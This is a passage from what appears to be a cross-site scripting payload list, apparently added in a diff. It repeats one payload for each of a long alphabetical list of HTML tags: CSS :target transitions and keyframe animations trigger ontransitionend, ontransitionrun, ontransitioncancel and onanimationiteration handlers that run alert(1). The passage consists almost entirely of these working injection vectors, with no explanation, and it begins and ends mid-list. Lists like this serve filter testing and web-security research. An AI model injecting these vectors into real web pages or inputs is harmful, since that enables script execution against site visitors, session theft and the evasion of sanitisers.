id=x style="transition:color 1s" ontransitionend=alert(1)></p> +<style>:target {color:red;}</style><param id=x style="transition:color 1s" ontransitionend=alert(1)></param> +<style>:target {color:red;}</style><picture id=x style="transition:color 1s" ontransitionend=alert(1)></picture> +<style>:target {color:red;}</style><plaintext id=x style="transition:color 1s" ontransitionend=alert(1)></plaintext> +<style>:target {color:red;}</style><pre id=x style="transition:color 1s" ontransitionend=alert(1)></pre> +<style>:target {color:red;}</style><progress id=x style="transition:color 1s" ontransitionend=alert(1)></progress> +<style>:target {color:red;}</style><q id=x style="transition:color 1s" ontransitionend=alert(1)></q> +<style>:target {color:red;}</style><rb id=x style="transition:color 1s" ontransitionend=alert(1)></rb> +<style>:target {color:red;}</style><rp id=x style="transition:color 1s" ontransitionend=alert(1)></rp> +<style>:target {color:red;}</style><rt id=x style="transition:color 1s" ontransitionend=alert(1)></rt> +<style>:target {color:red;}</style><rtc id=x style="transition:color 1s" ontransitionend=alert(1)></rtc> +<style>:target {color:red;}</style><ruby id=x style="transition:color 1s" ontransitionend=alert(1)></ruby> +<style>:target {color:red;}</style><s id=x style="transition:color 1s" ontransitionend=alert(1)></s> +<style>:target {color:red;}</style><samp id=x style="transition:color 1s" ontransitionend=alert(1)></samp> +<style>:target {color:red;}</style><script id=x style="transition:color 1s" ontransitionend=alert(1)></script> +<style>:target {color:red;}</style><section id=x style="transition:color 1s" ontransitionend=alert(1)></section> +<style>:target {color:red;}</style><select id=x style="transition:color 1s" ontransitionend=alert(1)></select> +<style>:target {color:red;}</style><shadow id=x style="transition:color 1s" ontransitionend=alert(1)></shadow> +<style>:target {color:red;}</style><slot id=x style="transition:color 1s" 
ontransitionend=alert(1)></slot> +<style>:target {color:red;}</style><small id=x style="transition:color 1s" ontransitionend=alert(1)></small> +<style>:target {color:red;}</style><source id=x style="transition:color 1s" ontransitionend=alert(1)></source> +<style>:target {color:red;}</style><spacer id=x style="transition:color 1s" ontransitionend=alert(1)></spacer> +<style>:target {color:red;}</style><span id=x style="transition:color 1s" ontransitionend=alert(1)></span> +<style>:target {color:red;}</style><strike id=x style="transition:color 1s" ontransitionend=alert(1)></strike> +<style>:target {color:red;}</style><strong id=x style="transition:color 1s" ontransitionend=alert(1)></strong> +<style>:target {color:red;}</style><style id=x style="transition:color 1s" ontransitionend=alert(1)></style> +<style>:target {color:red;}</style><sub id=x style="transition:color 1s" ontransitionend=alert(1)></sub> +<style>:target {color:red;}</style><summary id=x style="transition:color 1s" ontransitionend=alert(1)></summary> +<style>:target {color:red;}</style><sup id=x style="transition:color 1s" ontransitionend=alert(1)></sup> +<style>:target {color:red;}</style><svg id=x style="transition:color 1s" ontransitionend=alert(1)></svg> +<style>:target {color:red;}</style><table id=x style="transition:color 1s" ontransitionend=alert(1)></table> +<style>:target {color:red;}</style><tbody id=x style="transition:color 1s" ontransitionend=alert(1)></tbody> +<style>:target {color:red;}</style><td id=x style="transition:color 1s" ontransitionend=alert(1)></td> +<style>:target {color:red;}</style><template id=x style="transition:color 1s" ontransitionend=alert(1)></template> +<style>:target {color:red;}</style><textarea id=x style="transition:color 1s" ontransitionend=alert(1)></textarea> +<style>:target {color:red;}</style><tfoot id=x style="transition:color 1s" ontransitionend=alert(1)></tfoot> +<style>:target {color:red;}</style><th id=x style="transition:color 1s" 
ontransitionend=alert(1)></th> +<style>:target {color:red;}</style><thead id=x style="transition:color 1s" ontransitionend=alert(1)></thead> +<style>:target {color:red;}</style><time id=x style="transition:color 1s" ontransitionend=alert(1)></time> +<style>:target {color:red;}</style><title id=x style="transition:color 1s" ontransitionend=alert(1)></title> +<style>:target {color:red;}</style><tr id=x style="transition:color 1s" ontransitionend=alert(1)></tr> +<style>:target {color:red;}</style><track id=x style="transition:color 1s" ontransitionend=alert(1)></track> +<style>:target {color:red;}</style><tt id=x style="transition:color 1s" ontransitionend=alert(1)></tt> +<style>:target {color:red;}</style><u id=x style="transition:color 1s" ontransitionend=alert(1)></u> +<style>:target {color:red;}</style><ul id=x style="transition:color 1s" ontransitionend=alert(1)></ul> +<style>:target {color:red;}</style><var id=x style="transition:color 1s" ontransitionend=alert(1)></var> +<style>:target {color:red;}</style><video id=x style="transition:color 1s" ontransitionend=alert(1)></video> +<style>:target {color:red;}</style><wbr id=x style="transition:color 1s" ontransitionend=alert(1)></wbr> +<style>:target {color:red;}</style><xmp id=x style="transition:color 1s" ontransitionend=alert(1)></xmp> +<style>:target {transform: rotate(180deg);}</style><a id=x style="transition:transform 2s" ontransitionrun=alert(1)></a> +<style>:target {transform: rotate(180deg);}</style><abbr id=x style="transition:transform 2s" ontransitionrun=alert(1)></abbr> +<style>:target {transform: rotate(180deg);}</style><acronym id=x style="transition:transform 2s" ontransitionrun=alert(1)></acronym> +<style>:target {transform: rotate(180deg);}</style><address id=x style="transition:transform 2s" ontransitionrun=alert(1)></address> +<style>:target {transform: rotate(180deg);}</style><applet id=x style="transition:transform 2s" ontransitionrun=alert(1)></applet> +<style>:target {transform: 
rotate(180deg);}</style><area id=x style="transition:transform 2s" ontransitionrun=alert(1)></area> +<style>:target {transform: rotate(180deg);}</style><article id=x style="transition:transform 2s" ontransitionrun=alert(1)></article> +<style>:target {transform: rotate(180deg);}</style><aside id=x style="transition:transform 2s" ontransitionrun=alert(1)></aside> +<style>:target {transform: rotate(180deg);}</style><audio id=x style="transition:transform 2s" ontransitionrun=alert(1)></audio> +<style>:target {transform: rotate(180deg);}</style><b id=x style="transition:transform 2s" ontransitionrun=alert(1)></b> +<style>:target {transform: rotate(180deg);}</style><base id=x style="transition:transform 2s" ontransitionrun=alert(1)></base> +<style>:target {transform: rotate(180deg);}</style><basefont id=x style="transition:transform 2s" ontransitionrun=alert(1)></basefont> +<style>:target {transform: rotate(180deg);}</style><bdi id=x style="transition:transform 2s" ontransitionrun=alert(1)></bdi> +<style>:target {transform: rotate(180deg);}</style><bdo id=x style="transition:transform 2s" ontransitionrun=alert(1)></bdo> +<style>:target {transform: rotate(180deg);}</style><bgsound id=x style="transition:transform 2s" ontransitionrun=alert(1)></bgsound> +<style>:target {transform: rotate(180deg);}</style><big id=x style="transition:transform 2s" ontransitionrun=alert(1)></big> +<style>:target {transform: rotate(180deg);}</style><blink id=x style="transition:transform 2s" ontransitionrun=alert(1)></blink> +<style>:target {transform: rotate(180deg);}</style><blockquote id=x style="transition:transform 2s" ontransitionrun=alert(1)></blockquote> +<style>:target {transform: rotate(180deg);}</style><body id=x style="transition:transform 2s" ontransitionrun=alert(1)></body> +<style>:target {transform: rotate(180deg);}</style><br id=x style="transition:transform 2s" ontransitionrun=alert(1)></br> +<style>:target {transform: rotate(180deg);}</style><button id=x 
style="transition:transform 2s" ontransitionrun=alert(1)></button> +<style>:target {transform: rotate(180deg);}</style><canvas id=x style="transition:transform 2s" ontransitionrun=alert(1)></canvas> +<style>:target {transform: rotate(180deg);}</style><caption id=x style="transition:transform 2s" ontransitionrun=alert(1)></caption> +<style>:target {transform: rotate(180deg);}</style><center id=x style="transition:transform 2s" ontransitionrun=alert(1)></center> +<style>:target {transform: rotate(180deg);}</style><cite id=x style="transition:transform 2s" ontransitionrun=alert(1)></cite> +<style>:target {transform: rotate(180deg);}</style><code id=x style="transition:transform 2s" ontransitionrun=alert(1)></code> +<style>:target {transform: rotate(180deg);}</style><col id=x style="transition:transform 2s" ontransitionrun=alert(1)></col> +<style>:target {transform: rotate(180deg);}</style><colgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)></colgroup> +<style>:target {transform: rotate(180deg);}</style><command id=x style="transition:transform 2s" ontransitionrun=alert(1)></command> +<style>:target {transform: rotate(180deg);}</style><content id=x style="transition:transform 2s" ontransitionrun=alert(1)></content> +<style>:target {transform: rotate(180deg);}</style><data id=x style="transition:transform 2s" ontransitionrun=alert(1)></data> +<style>:target {transform: rotate(180deg);}</style><datalist id=x style="transition:transform 2s" ontransitionrun=alert(1)></datalist> +<style>:target {transform: rotate(180deg);}</style><dd id=x style="transition:transform 2s" ontransitionrun=alert(1)></dd> +<style>:target {transform: rotate(180deg);}</style><del id=x style="transition:transform 2s" ontransitionrun=alert(1)></del> +<style>:target {transform: rotate(180deg);}</style><details id=x style="transition:transform 2s" ontransitionrun=alert(1)></details> +<style>:target {transform: rotate(180deg);}</style><dfn id=x style="transition:transform 2s" 
ontransitionrun=alert(1)></dfn> +<style>:target {transform: rotate(180deg);}</style><dialog id=x style="transition:transform 2s" ontransitionrun=alert(1)></dialog> +<style>:target {transform: rotate(180deg);}</style><dir id=x style="transition:transform 2s" ontransitionrun=alert(1)></dir> +<style>:target {transform: rotate(180deg);}</style><div id=x style="transition:transform 2s" ontransitionrun=alert(1)></div> +<style>:target {transform: rotate(180deg);}</style><dl id=x style="transition:transform 2s" ontransitionrun=alert(1)></dl> +<style>:target {transform: rotate(180deg);}</style><dt id=x style="transition:transform 2s" ontransitionrun=alert(1)></dt> +<style>:target {transform: rotate(180deg);}</style><element id=x style="transition:transform 2s" ontransitionrun=alert(1)></element> +<style>:target {transform: rotate(180deg);}</style><em id=x style="transition:transform 2s" ontransitionrun=alert(1)></em> +<style>:target {transform: rotate(180deg);}</style><embed id=x style="transition:transform 2s" ontransitionrun=alert(1)></embed> +<style>:target {transform: rotate(180deg);}</style><fieldset id=x style="transition:transform 2s" ontransitionrun=alert(1)></fieldset> +<style>:target {transform: rotate(180deg);}</style><figcaption id=x style="transition:transform 2s" ontransitionrun=alert(1)></figcaption> +<style>:target {transform: rotate(180deg);}</style><figure id=x style="transition:transform 2s" ontransitionrun=alert(1)></figure> +<style>:target {transform: rotate(180deg);}</style><font id=x style="transition:transform 2s" ontransitionrun=alert(1)></font> +<style>:target {transform: rotate(180deg);}</style><footer id=x style="transition:transform 2s" ontransitionrun=alert(1)></footer> +<style>:target {transform: rotate(180deg);}</style><form id=x style="transition:transform 2s" ontransitionrun=alert(1)></form> +<style>:target {transform: rotate(180deg);}</style><frame id=x style="transition:transform 2s" ontransitionrun=alert(1)></frame> +<style>:target 
{transform: rotate(180deg);}</style><frameset id=x style="transition:transform 2s" ontransitionrun=alert(1)></frameset> +<style>:target {transform: rotate(180deg);}</style><h1 id=x style="transition:transform 2s" ontransitionrun=alert(1)></h1> +<style>:target {transform: rotate(180deg);}</style><head id=x style="transition:transform 2s" ontransitionrun=alert(1)></head> +<style>:target {transform: rotate(180deg);}</style><header id=x style="transition:transform 2s" ontransitionrun=alert(1)></header> +<style>:target {transform: rotate(180deg);}</style><hgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)></hgroup> +<style>:target {transform: rotate(180deg);}</style><hr id=x style="transition:transform 2s" ontransitionrun=alert(1)></hr> +<style>:target {transform: rotate(180deg);}</style><html id=x style="transition:transform 2s" ontransitionrun=alert(1)></html> +<style>:target {transform: rotate(180deg);}</style><i id=x style="transition:transform 2s" ontransitionrun=alert(1)></i> +<style>:target {transform: rotate(180deg);}</style><iframe id=x style="transition:transform 2s" ontransitionrun=alert(1)></iframe> +<style>:target {transform: rotate(180deg);}</style><image id=x style="transition:transform 2s" ontransitionrun=alert(1)></image> +<style>:target {transform: rotate(180deg);}</style><img id=x style="transition:transform 2s" ontransitionrun=alert(1)></img> +<style>:target {transform: rotate(180deg);}</style><input id=x style="transition:transform 2s" ontransitionrun=alert(1)></input> +<style>:target {transform: rotate(180deg);}</style><ins id=x style="transition:transform 2s" ontransitionrun=alert(1)></ins> +<style>:target {transform: rotate(180deg);}</style><isindex id=x style="transition:transform 2s" ontransitionrun=alert(1)></isindex> +<style>:target {transform: rotate(180deg);}</style><kbd id=x style="transition:transform 2s" ontransitionrun=alert(1)></kbd> +<style>:target {transform: rotate(180deg);}</style><keygen id=x 
style="transition:transform 2s" ontransitionrun=alert(1)></keygen> +<style>:target {transform: rotate(180deg);}</style><label id=x style="transition:transform 2s" ontransitionrun=alert(1)></label> +<style>:target {transform: rotate(180deg);}</style><legend id=x style="transition:transform 2s" ontransitionrun=alert(1)></legend> +<style>:target {transform: rotate(180deg);}</style><li id=x style="transition:transform 2s" ontransitionrun=alert(1)></li> +<style>:target {transform: rotate(180deg);}</style><link id=x style="transition:transform 2s" ontransitionrun=alert(1)></link> +<style>:target {transform: rotate(180deg);}</style><listing id=x style="transition:transform 2s" ontransitionrun=alert(1)></listing> +<style>:target {transform: rotate(180deg);}</style><main id=x style="transition:transform 2s" ontransitionrun=alert(1)></main> +<style>:target {transform: rotate(180deg);}</style><map id=x style="transition:transform 2s" ontransitionrun=alert(1)></map> +<style>:target {transform: rotate(180deg);}</style><mark id=x style="transition:transform 2s" ontransitionrun=alert(1)></mark> +<style>:target {transform: rotate(180deg);}</style><marquee id=x style="transition:transform 2s" ontransitionrun=alert(1)></marquee> +<style>:target {transform: rotate(180deg);}</style><menu id=x style="transition:transform 2s" ontransitionrun=alert(1)></menu> +<style>:target {transform: rotate(180deg);}</style><menuitem id=x style="transition:transform 2s" ontransitionrun=alert(1)></menuitem> +<style>:target {transform: rotate(180deg);}</style><meta id=x style="transition:transform 2s" ontransitionrun=alert(1)></meta> +<style>:target {transform: rotate(180deg);}</style><meter id=x style="transition:transform 2s" ontransitionrun=alert(1)></meter> +<style>:target {transform: rotate(180deg);}</style><multicol id=x style="transition:transform 2s" ontransitionrun=alert(1)></multicol> +<style>:target {transform: rotate(180deg);}</style><nav id=x style="transition:transform 2s" 
ontransitionrun=alert(1)></nav> +<style>:target {transform: rotate(180deg);}</style><nextid id=x style="transition:transform 2s" ontransitionrun=alert(1)></nextid> +<style>:target {transform: rotate(180deg);}</style><nobr id=x style="transition:transform 2s" ontransitionrun=alert(1)></nobr> +<style>:target {transform: rotate(180deg);}</style><noembed id=x style="transition:transform 2s" ontransitionrun=alert(1)></noembed> +<style>:target {transform: rotate(180deg);}</style><noframes id=x style="transition:transform 2s" ontransitionrun=alert(1)></noframes> +<style>:target {transform: rotate(180deg);}</style><noscript id=x style="transition:transform 2s" ontransitionrun=alert(1)></noscript> +<style>:target {transform: rotate(180deg);}</style><object id=x style="transition:transform 2s" ontransitionrun=alert(1)></object> +<style>:target {transform: rotate(180deg);}</style><ol id=x style="transition:transform 2s" ontransitionrun=alert(1)></ol> +<style>:target {transform: rotate(180deg);}</style><optgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)></optgroup> +<style>:target {transform: rotate(180deg);}</style><option id=x style="transition:transform 2s" ontransitionrun=alert(1)></option> +<style>:target {transform: rotate(180deg);}</style><output id=x style="transition:transform 2s" ontransitionrun=alert(1)></output> +<style>:target {transform: rotate(180deg);}</style><p id=x style="transition:transform 2s" ontransitionrun=alert(1)></p> +<style>:target {transform: rotate(180deg);}</style><param id=x style="transition:transform 2s" ontransitionrun=alert(1)></param> +<style>:target {transform: rotate(180deg);}</style><picture id=x style="transition:transform 2s" ontransitionrun=alert(1)></picture> +<style>:target {transform: rotate(180deg);}</style><plaintext id=x style="transition:transform 2s" ontransitionrun=alert(1)></plaintext> +<style>:target {transform: rotate(180deg);}</style><pre id=x style="transition:transform 2s" 
ontransitionrun=alert(1)></pre> +<style>:target {transform: rotate(180deg);}</style><progress id=x style="transition:transform 2s" ontransitionrun=alert(1)></progress> +<style>:target {transform: rotate(180deg);}</style><q id=x style="transition:transform 2s" ontransitionrun=alert(1)></q> +<style>:target {transform: rotate(180deg);}</style><rb id=x style="transition:transform 2s" ontransitionrun=alert(1)></rb> +<style>:target {transform: rotate(180deg);}</style><rp id=x style="transition:transform 2s" ontransitionrun=alert(1)></rp> +<style>:target {transform: rotate(180deg);}</style><rt id=x style="transition:transform 2s" ontransitionrun=alert(1)></rt> +<style>:target {transform: rotate(180deg);}</style><rtc id=x style="transition:transform 2s" ontransitionrun=alert(1)></rtc> +<style>:target {transform: rotate(180deg);}</style><ruby id=x style="transition:transform 2s" ontransitionrun=alert(1)></ruby> +<style>:target {transform: rotate(180deg);}</style><s id=x style="transition:transform 2s" ontransitionrun=alert(1)></s> +<style>:target {transform: rotate(180deg);}</style><samp id=x style="transition:transform 2s" ontransitionrun=alert(1)></samp> +<style>:target {transform: rotate(180deg);}</style><script id=x style="transition:transform 2s" ontransitionrun=alert(1)></script> +<style>:target {transform: rotate(180deg);}</style><section id=x style="transition:transform 2s" ontransitionrun=alert(1)></section> +<style>:target {transform: rotate(180deg);}</style><select id=x style="transition:transform 2s" ontransitionrun=alert(1)></select> +<style>:target {transform: rotate(180deg);}</style><shadow id=x style="transition:transform 2s" ontransitionrun=alert(1)></shadow> +<style>:target {transform: rotate(180deg);}</style><slot id=x style="transition:transform 2s" ontransitionrun=alert(1)></slot> +<style>:target {transform: rotate(180deg);}</style><small id=x style="transition:transform 2s" ontransitionrun=alert(1)></small> +<style>:target {transform: 
rotate(180deg);}</style><source id=x style="transition:transform 2s" ontransitionrun=alert(1)></source> +<style>:target {transform: rotate(180deg);}</style><spacer id=x style="transition:transform 2s" ontransitionrun=alert(1)></spacer> +<style>:target {transform: rotate(180deg);}</style><span id=x style="transition:transform 2s" ontransitionrun=alert(1)></span> +<style>:target {transform: rotate(180deg);}</style><strike id=x style="transition:transform 2s" ontransitionrun=alert(1)></strike> +<style>:target {transform: rotate(180deg);}</style><strong id=x style="transition:transform 2s" ontransitionrun=alert(1)></strong> +<style>:target {transform: rotate(180deg);}</style><style id=x style="transition:transform 2s" ontransitionrun=alert(1)></style> +<style>:target {transform: rotate(180deg);}</style><sub id=x style="transition:transform 2s" ontransitionrun=alert(1)></sub> +<style>:target {transform: rotate(180deg);}</style><summary id=x style="transition:transform 2s" ontransitionrun=alert(1)></summary> +<style>:target {transform: rotate(180deg);}</style><sup id=x style="transition:transform 2s" ontransitionrun=alert(1)></sup> +<style>:target {transform: rotate(180deg);}</style><svg id=x style="transition:transform 2s" ontransitionrun=alert(1)></svg> +<style>:target {transform: rotate(180deg);}</style><table id=x style="transition:transform 2s" ontransitionrun=alert(1)></table> +<style>:target {transform: rotate(180deg);}</style><tbody id=x style="transition:transform 2s" ontransitionrun=alert(1)></tbody> +<style>:target {transform: rotate(180deg);}</style><td id=x style="transition:transform 2s" ontransitionrun=alert(1)></td> +<style>:target {transform: rotate(180deg);}</style><template id=x style="transition:transform 2s" ontransitionrun=alert(1)></template> +<style>:target {transform: rotate(180deg);}</style><textarea id=x style="transition:transform 2s" ontransitionrun=alert(1)></textarea> +<style>:target {transform: rotate(180deg);}</style><tfoot id=x 
style="transition:transform 2s" ontransitionrun=alert(1)></tfoot> +<style>:target {transform: rotate(180deg);}</style><th id=x style="transition:transform 2s" ontransitionrun=alert(1)></th> +<style>:target {transform: rotate(180deg);}</style><thead id=x style="transition:transform 2s" ontransitionrun=alert(1)></thead> +<style>:target {transform: rotate(180deg);}</style><time id=x style="transition:transform 2s" ontransitionrun=alert(1)></time> +<style>:target {transform: rotate(180deg);}</style><title id=x style="transition:transform 2s" ontransitionrun=alert(1)></title> +<style>:target {transform: rotate(180deg);}</style><tr id=x style="transition:transform 2s" ontransitionrun=alert(1)></tr> +<style>:target {transform: rotate(180deg);}</style><track id=x style="transition:transform 2s" ontransitionrun=alert(1)></track> +<style>:target {transform: rotate(180deg);}</style><tt id=x style="transition:transform 2s" ontransitionrun=alert(1)></tt> +<style>:target {transform: rotate(180deg);}</style><u id=x style="transition:transform 2s" ontransitionrun=alert(1)></u> +<style>:target {transform: rotate(180deg);}</style><ul id=x style="transition:transform 2s" ontransitionrun=alert(1)></ul> +<style>:target {transform: rotate(180deg);}</style><var id=x style="transition:transform 2s" ontransitionrun=alert(1)></var> +<style>:target {transform: rotate(180deg);}</style><video id=x style="transition:transform 2s" ontransitionrun=alert(1)></video> +<style>:target {transform: rotate(180deg);}</style><wbr id=x style="transition:transform 2s" ontransitionrun=alert(1)></wbr> +<style>:target {transform: rotate(180deg);}</style><xmp id=x style="transition:transform 2s" ontransitionrun=alert(1)></xmp> +<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 10s" ontransitioncancel=alert(1)></xss> +<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=alert(1)></xss> +<style>@keyframes slidein 
{}</style><a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></a> +<style>@keyframes slidein {}</style><abbr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></abbr> +<style>@keyframes slidein {}</style><acronym style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></acronym> +<style>@keyframes slidein {}</style><address style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></address> +<style>@keyframes slidein {}</style><applet style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></applet> +<style>@keyframes slidein {}</style><area style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></area> +<style>@keyframes slidein {}</style><article style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></article> +<style>@keyframes slidein {}</style><aside style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></aside> +<style>@keyframes slidein {}</style><audio style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></audio> +<style>@keyframes slidein {}</style><b style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></b> +<style>@keyframes slidein {}</style><base style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></base> +<style>@keyframes slidein {}</style><basefont style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></basefont> +<style>@keyframes slidein 
{}</style><bdi style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></bdi> +<style>@keyframes slidein {}</style><bdo style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></bdo> +<style>@keyframes slidein {}</style><bgsound style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></bgsound> +<style>@keyframes slidein {}</style><big style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></big> +<style>@keyframes slidein {}</style><blink style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></blink> +<style>@keyframes slidein {}</style><blockquote style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></blockquote> +<style>@keyframes slidein {}</style><body style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></body> +<style>@keyframes slidein {}</style><br style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></br> +<style>@keyframes slidein {}</style><button style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></button> +<style>@keyframes slidein {}</style><canvas style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></canvas> +<style>@keyframes slidein {}</style><caption style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></caption> +<style>@keyframes slidein {}</style><center style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></center> +<style>@keyframes slidein 
{}</style><cite style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></cite> +<style>@keyframes slidein {}</style><code style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></code> +<style>@keyframes slidein {}</style><col style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></col> +<style>@keyframes slidein {}</style><colgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></colgroup> +<style>@keyframes slidein {}</style><command style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></command> +<style>@keyframes slidein {}</style><content style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></content> +<style>@keyframes slidein {}</style><data style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></data> +<style>@keyframes slidein {}</style><datalist style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></datalist> +<style>@keyframes slidein {}</style><dd style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dd> +<style>@keyframes slidein {}</style><del style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></del> +<style>@keyframes slidein {}</style><details style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></details> +<style>@keyframes slidein {}</style><dfn style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dfn> +<style>@keyframes slidein 
{}</style><dialog style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dialog> +<style>@keyframes slidein {}</style><dir style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dir> +<style>@keyframes slidein {}</style><div style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></div> +<style>@keyframes slidein {}</style><dl style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dl> +<style>@keyframes slidein {}</style><dt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dt> +<style>@keyframes slidein {}</style><element style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></element> +<style>@keyframes slidein {}</style><em style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></em> +<style>@keyframes slidein {}</style><embed style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></embed> +<style>@keyframes slidein {}</style><fieldset style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></fieldset> +<style>@keyframes slidein {}</style><figcaption style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></figcaption> +<style>@keyframes slidein {}</style><figure style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></figure> +<style>@keyframes slidein {}</style><font style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></font> +<style>@keyframes slidein 
{}</style><footer style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></footer> +<style>@keyframes slidein {}</style><form style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></form> +<style>@keyframes slidein {}</style><frame style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></frame> +<style>@keyframes slidein {}</style><frameset style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></frameset> +<style>@keyframes slidein {}</style><h1 style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></h1> +<style>@keyframes slidein {}</style><head style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></head> +<style>@keyframes slidein {}</style><header style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></header> +<style>@keyframes slidein {}</style><hgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></hgroup> +<style>@keyframes slidein {}</style><hr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></hr> +<style>@keyframes slidein {}</style><html style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></html> +<style>@keyframes slidein {}</style><i style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></i> +<style>@keyframes slidein {}</style><iframe style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></iframe> +<style>@keyframes slidein {}</style><image 
style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></image> +<style>@keyframes slidein {}</style><img style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></img> +<style>@keyframes slidein {}</style><input style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></input> +<style>@keyframes slidein {}</style><ins style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ins> +<style>@keyframes slidein {}</style><isindex style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></isindex> +<style>@keyframes slidein {}</style><kbd style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></kbd> +<style>@keyframes slidein {}</style><keygen style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></keygen> +<style>@keyframes slidein {}</style><label style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></label> +<style>@keyframes slidein {}</style><legend style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></legend> +<style>@keyframes slidein {}</style><li style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></li> +<style>@keyframes slidein {}</style><link style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></link> +<style>@keyframes slidein {}</style><listing style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></listing> +<style>@keyframes slidein 